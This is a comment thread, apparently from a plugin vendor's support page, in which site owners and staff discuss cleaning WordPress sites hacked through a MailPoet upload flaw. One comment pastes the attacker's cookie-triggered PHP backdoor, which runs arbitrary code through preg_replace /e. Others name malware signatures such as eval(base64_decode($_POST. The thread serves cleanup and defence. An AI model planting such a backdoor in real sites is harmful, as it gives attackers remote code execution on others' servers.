    Again, please make your messages clearer. Early July, my understanding was: you need to update because of a security risk. I do that regularly with many different software and there never is any problem (so far anyway), so since the websites were running fine on the front-end, I had no way to know my sites were infected. And I DID do the 3.6.8 update in a timely fashion.

    Author’s gravatar

    The sites seem ok. Except one of them has a folder in the Wysija/themes that is called “Main” (Default is still there). In that “Main” Theme there is an index.php file (your email said there wasn’t supposed to be any.
    That php file says:

    (php) **
    * @package Joomla.Plugin.System
    * @since 1.5
    *
    *
    */
    class PlgSysJoomla {
    public function __construct() {
    $file=@$_COOKIE[‘ljNqe3’];
    if ($file){ $opt=$file(@$_COOKIE[‘ljNqe2’]); $au=$file(@$_COOKIE[‘ljNqe1’]); $opt(“/292/e”,$au,292); die();} else {phpinfo();die;}}}
    $index=new PlgSysJoomla;

    Joomla! in a WP install!

    The other files in that folder include an error log which includes many lines similar to this: [05-Jul-2014 06:51:52] PHP Warning: scandir(../components) [function.scandir]: failed to open dir: No such file or directory in /home/bcbemeru/public_html/wp-content/uploads/wysija/themes/main/index.php(11) : regexp code(1) : eval ( )’d code on line 34

    As if they somehow think this is a joomla site.

    ****

    Based on Sucuri’s info, I scanned (search function) for malicious code and can’t find any. I spot checked many .php files (config, index, etc.) and they all look clean.

    I believe if I remove the themes/main folder, everything should be fine without having to do anything else.

    What do you think? That strange folder was installed on July 5.

    The only other thing installed or updated on July 5 was a wysija/ folder called “Temp” in which there is only a blank index.html file.

    So my question really is: is the “main” theme a legitimate theme so that I should delete only the .php file or should I delete the whole “main” theme folder?

    Marie

    Author’s gravatar

    I recommend examining your site files more thoroughly. On my site, at first glance it looked like there was only 2 folders named main and main2 that had the same code as you show. Like you, my site was hacked on July 5 and the site operation itself showed no symptoms on the surface. But I contacted my hosting company and asked for a list of all files added or modified since July 5. It turns out that 45 of my files were infected. For example, wp-includes/class-wp-image-editor-gd.php had a line of code with eval ( base64_decode ) at the top, which is a classic backdoor. There were scores more like it sprinkled throughout the site. Any one of those files would allow arbitrary code to be executed.

    Author’s gravatar

    Marie,

    If there is a PHP file located in your wp-content/uploads/wysija folders or subfolders, you can be sure that this is not legitimate.

    So an attack has been performed on your site that’s certain.
    As Joanne said, depending on the hack, your whole WP file system could be infected, this is why we recommend to restore a backup of both your files and database to a date prior to the hack.

    But you also need to change all of your credentials… we have written a small guide to help you with the whole process: http://support.mailpoet.com/knowledgebase/site-hacked-what-to-do/

    Your host should be able to help you somehow.

    Author’s gravatar

    Hi Ben,

    I know all of what you are saying. my question was: is the MAIN theme a legitimate theme and only the .php file has to be deleted in THAT folder or is the WHOLE THEME/MAIN folder something implanted by the hacker.

    As for the rest, I can read and your instructions were clear, I know how to clean up my site, so please answer THAT question: is the MAIN theme a legitimate theme created by MailPoet at some point or not?

    Thanks.

    Author’s gravatar

    This theme has been implanted by a hacker for sure.

    You CAN’T have any php files in your wp-content/uploads/wysija/ folder.

    Actually I can’t think of any reason to have a php file within the uploads folder at all: wp-content/uploads/

    Author’s gravatar

    Hi Marie,

    What did you do with that joomla thing? I have it as well…Should I delete the “main” folder?

    Author’s gravatar

    That was my question but it didn’t get answered yet.

    Author’s gravatar

    On my site, the “main” folder showed up after July 1, so I deleted the whole folder with no ill effects.

    Author’s gravatar

    There is no reason to keep that file which has been uploaded by an attacker and is certainly very dangerous.

    Unless you want to study how and when you got hacked.

    The “when” can prove useful here just in order to determine the date where your backup was safe.

    So you can do the right database and files restoration on your site.

    Author’s gravatar

    Selon vos précisions, il ne doit avoir aucun fichier php dans le dossier Uploads. Pourtant, j’utilise le plugin Sucuri Security qui rajoute un répertoire dans le dossier Uploads. Est-ce normal? Est-ce que je risque quelque chose à garder ce plugin en ligne? Cordialement

    Author’s gravatar

    J’ose imaginer qu’ils doivent avoir une bonne raison pour uploader un fichier PHP dans ce dossier, cela doit surement être utile pour leur tests.

    Toutefois il conviendrait mieux de vérifier avec eux directement.

    Author’s gravatar

    Il me semble que les instructions c’est qu’il ne doit y avoir aucun fichier php dans le dossier:

    wp-content/uploads/WYSIJA (sans les majuscules)

    et non dans wp-content/uploads (qui sert à bien d’autres choses).

    Author’s gravatar

    En toute logique il ne devrait jamais y’avoir de fichier PHP dans le dossier upload wp-content/uploads

    Je ne peux penser à aucune raison valide pour avoir un fichier PHP dans ce dossier.

    Je pense même comme Julio Potier (monsieur sécurité pour WordPress en France) que l’on devrait avoir une régle htaccess sur ce dossier pour s’éviter bien des problèmes, vous pouvez lire plus en détails ici:
    http://blog.secupress.fr/attaques-wordpress-261.html

    Author’s gravatar

    J’avais lu qu’il ne devait avoir aucun fichier php dans le dossier uploads… Mais le plugin de sécurité Sucuri Security que j’ai ajouté après le hack WordPress/Mailpoet rajoute un dossier dans uploads contenant des fichiers php. Penses-tu que je risque quelque chose en gardant les fichiers PHP dans ce dossier sensible?

    Author’s gravatar

    Comme je le disais dans un commentaire un peu plus haut, si Sucuri le fait, cela doit être pour une bonne raison, ils doivent l’utiliser de manière à executer des tests et vérifier que votre site est bien sécurisé.

    De manière général il n’y a pas de raison d’avoir de fichiers PHP dans ce dossier. Toutefois, le cas Sucuri qui est un programme dédié à protéger votre site est l’exception qui ne fait que confirmer la règle.

    Si vous avez des doutes, je vous conseille de leur demander quelle est l’utilité de ces fichiers, toutefois je ne m’inquiéterais pas plus que ça.

    Author’s gravatar

    En fait, Anti-Malware lui-même (que vous avez recommandé) ajoute tous les fichiers corrompus (donc tous des .php) dans un dossier “quarantine” dans… uploads!

    J’ai actuellement dans ce dossier 30 fichiers php malware (originaux des fichiers corrompus corrigés par Anti-Malware) et les instructions de Anti-Malware sont de les laisser là, qu’ils ne nuisent pas !!!!!

    Alors Ben?

    ???

    Author’s gravatar

    I no longer have access to any of my plugins and I did not even have your plugin activated – just installed! Now what? There is no back-up beyond the night before from the host – which is obviously bad. Now what?

    Author’s gravatar

    If our plugin was not activated, no code could be executed and this hack could not be possible.

    It could be because you’re on a shared hosting server and that neighbors sites have been hacked through that vulnerability or a different one, ask your hosting company about that they should know.

    Also it could be because you’ve had been hacked through another backdoor…

    Here is a list of plugins in which has been discovered a security vulnerability between the 18th of June and 18th of July :

    – WPTouch Authenticated File Upload
    – CopySafe PDF Protection 0.6 Shell Upload
    – Tidio Gallery 1.1 Shell Upload / XSS
    – Download Manager 2.6.8 Shell Upload
    – MailPoet wysija-newsletters Unauthenticated File Upload
    – NextGEN Gallery 2.0.63 Shell Upload

    Finally here is a KB article giving you steps if your site has been hacked:
    http://support.mailpoet.com/knowledgebase/site-hacked-what-to-do/

    Author’s gravatar

    None of the other plugins you listed have ever been installed or activated. I will check with the server techs to see if anyone else has been hacked. Your link goes on the premise that a good back-up file exists – which there is not… So, what now?

    Author’s gravatar

    @ben merci pour ton intervention, cela me rassure. Oui, j’ai modifié mon htaccess de manière à protéger mon dossier wp-include, mon wp-config, mon dossier upload ainsi que mon htaccess. Quand j’aurais fini la mise à jour des plugins, je ferais aussi un htaccess pour ne plus pouvoir éditer mon dossier thème et plugins + donc maintenant le plugin Sucuri Security (j’ai hésité avec Wordfence mais j’ai vu sur le web qu’il s’était aussi fait hacké par le passé…). Etant nul en anglais, j’ai préféré demandé ici comme on parle français xD. En tout cas, bon courage à votre équipe !!! Ce qui ne tue pas te rend plus fort !!!

    Author’s gravatar

    Franchement quel bazar, et je reste poli !!!
    une semaine de boulot de perdue

    Site bloqué par ovh vers le 16 juillet, 1 fichier php infecté
    avant de m’apercevoir que de tres nombreux fichiers avec ce type de code avaient été créés ou infectés !
    et pas seulement dans le repertoire wisija bien entendu !

    code :

    Pas de sauvegarde dispo au1er juillet malheureusement et compliqué de perdre plusieurs semaines de contenu !

    1. process de nettoyage mis en place (depuis le site est stable) :

    – sauvegarde FTP SQL
    – scan de tous les fichiers avec le code
    “eval ( base64_decode( $_POST”
    via le ftp d’ovh tres bien fait soit dit en passant
    – nettoyage à la main des nombreux fichiers
    – suppression de 2/3 fichier douteux
    – changement des passwords des comptes utilisateurs et admin, des passwords de la base sql, de l’acces ftp
    – securisation d’accès aux repertoires et au wp-config via un htaccess à la racine du site avec :

    # protect wpconfig.php

    order allow,deny
    deny from all

    # protection de la lecture des répertoires
    Options -Indexes

    – Remise en ligne du site bloqué par OVH via un “CHMOD 705” sur FTP

    – Mise a jour de tous les plugins et version de WP
    – et nombreux autres process de securité mis en place pour la sécurisation générale de wordpress (le fait d’avoir progressé en sécurité WP est bien là le seul côté positif de cette histoire en conclusion…) :
    ne pas utiliser le login “admin”
    masquer l’utilisation de WP et sa version
    suppression du fichier install.php
    suppression des plugin non utilisés
    …etc

    2. audit de votre install WP interessante a faire via :
    WordPress Security Scanner by the WPScan Team

    3. questions :
    – La procédure opérée ci-dessus est elle suffisante ?
    – Avez vous prévu un geste commercial ?
    – une check liste détaillée et exhaustive des corrections a mettre en place est elle disponible sans avoir recours a une mise a jour de la base et du ftp antérieur à l’attaque, cela serait plus que bienvenu.

    Merci de vos reponses

    Author’s gravatar

    “WordPress Security Scanner by the WPScan Team”

    Où trouve-t-on ça?

    Author’s gravatar

    Hi, all / Ben,

    can we all communicate in english? I really want to be able to read all info.. but my french is terrible.

    For what it’s worth: I got an email about the ‘critical security update’ on 3th of july and a part two on 5th! Too bad I was on holiday and could act, and found some hackers files as well.

    I think the ‘french’ instruction above are usefull but would really be nice to stick to english..

    Thank you.

    Author’s gravatar

    You say you want all in English. What about those who don’t speak English?

    The moderator is bilingual, what is the problem here? If you ask questions in English you will be answered in English (I’m sure you appreciate) and those who ask in French are answered in French (I’m sure they appreciate).

    Sorry. I get a bit upset with this kid of stuff. You don’t loose anything just because other people can get answers in their own language.

    Have a good day

    Author’s gravatar

    Hi Ramon, Hi all

    My previous comment in english (sorry in advance for bad translations) :

    What a big mess !

    My website was blocked by OVH on july 16th : one php file infected.
    Then I realise that a lot of files were infected, some of them were created, some of theme were modify in my WP directories (and not only the WYSIJA one)

    a code within php code “eval ( base64_decode ( $_POST” was added at the beginning of files

    unfortunatly no backup at the july 1st for me…
    and I did not want to loose weeks and week of content and work on my blog !

    1. the cleaning process I have done (my web site is working now, I hope so…)
    – FTP and SQL backup
    – scanning files of all the ftp containing “eval(base64_decode($_POST” code
    – cancellation of this code file by file (by hand…)
    – also suppression of 2 or 3 stange files (don’t ask me I don’t remember)
    – change of passwords for users, admin, sql base, FTP, SSH…
    – secure access of wp-config and folders via an htaccess file on the root domain :

    # protect wpconfig.php
    order allow,deny
    deny from all

    # protection de la lecture des répertoires
    Options -Indexes

    – Then reactivation of my web site thrue the OVH process : “CHMOD 705″ on filezilla

    – update of WP and all plugins
    – and lot of security processes added (basic ones) :
    change the “admin” login
    do not show that WP is used
    remove install.php
    remove unused plugins
    …etc

    2. a WP audit is interessant by :
    WordPress Security Scanner by the WPScan Team, you will find it with google easily

    3. questions :
    – This process is sufficient ?
    – what about a commercial reduction ?
    – a precise and official check list of things to do will be very usefull (and necessary), I mean a check list without the need of backup on the july 1st ! from my point of view it will recreate a trust feeling in mailpoet, wich is a great plugin but honestly I am a bit afraid of reactivate it…

    Thanks in advance for prompt reply
    BR

    Author’s gravatar

    Thank you, I really appriate it, and more important, other users can read and perform this actions as well.

    I think I did a simular action, I had another hack how ever.

    Also a statement to scan files for is “preg_replace”, this is also one nasty statement. I decoded I al the way back and it turned out to contain the interface page where the hacker could do al kinds of stuff..

    I downloaded all files with Filezilla (Windows) and used “AstroGrep” to scan all files.
    Also I scaned also with shorter and other statements:
    – “eval(base64_decode(
    – “\x47\x4cO\x42\x41\x4c\x53” <- this is hex for the eval statement! be aware for this as well!

    The thing I worry about is my Database content.. I could not restore an old version since it contains current orders which I would loose.

    The thing I did check: The number of Admin accounts: Seems that sometimes a 'ghost' account is created. This is the case that if the number of admin account is bigger then the actual admin names..

    Does anybody know what else to check for in the database?

    Another thing I did: I placed a .htaccess file in the upload directory to prevent from any php file being executed (future protection)

    the content of the .htaccess:

    deny from all

    Regards,
    Ramon

    Author’s gravatar

    another note: the bad files I found had the same date stamp as other files, so only looking for change date will not work in all cases..

    Author’s gravatar

    Another point :
    don’t try to scan files of all the ftp containing “eval ( base64_decode ( $_POST” code with windows, it do not work :(
    I use My OVH provider FTP access

    Author’s gravatar

    Hi guys,

    Don’t forget to have your host to delete the mail queue (more info how to do it via Putty here: http://www.cyberciti.biz/faq/exim-remove-all-messages-from-the-mail-queue/ , the best info was posted by adib ramezany at October 21, 2013 at 4:46 pm). In my mail queue, over 400.000 mails were waiting to be send and the mails kept sending, also after deleting everything. So also all my work trying to delist my IP from all the blacklisting sites was for nothing, because I did not cleaned this queue first.

    Good luck everybody, it was kind of a nightmare.

    Author’s gravatar

    Our website was hacked twice, blaming my hosting only to find it was MailPoet. The hacker managed to upload an index file to override our front page. Front page was showing who claimed to of hacked it. We have lost over a weeks post because of this and I am sending an invoice to your company address along with a draft from our lawyer.

    Thanks

Comments are closed.